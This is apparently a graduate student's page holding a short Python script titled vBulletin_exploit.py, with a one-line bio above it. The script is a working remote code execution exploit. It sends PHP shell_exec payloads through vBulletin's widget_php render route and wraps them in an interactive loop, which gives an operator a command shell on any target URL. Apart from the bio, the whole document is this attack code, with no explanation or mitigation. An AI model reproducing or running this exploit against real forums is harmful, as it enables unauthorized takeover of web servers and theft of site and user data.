Jack Cyber-security graduate student interested in researching privacy and security issues.

vBulletin_exploit.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import requests
import sys

if len(sys.argv) != 2:
	sys.exit("Usage: %s <URL to vBulletin (http://localhost)>" % sys.argv[0])

params = {"routestring":"ajax/render/widget_php"}

while True:
	try:
		params["widgetConfig[code]"] = "echo shell_exec('pwd'); exit;"
		pwd = requests.post(url = sys.argv[1], data = params)
		cmd = input("vBulletin " + pwd.text.strip() + "$ ")

		params["widgetConfig[code]"] = "echo shell_exec('" + str(cmd) + "'); exit;"
		r = requests.post(url = sys.argv[1], data = params)
		if r.status_code == 200:
			if r.text != "":
				print(r.text)
			else:
				print("Nothing Returned!")
		else:
			sys.exit("Exploit failed! :(")
	except KeyboardInterrupt:
		sys.exit("\nClosing shell...")
	except Exception as e:
		sys.exit(str(e))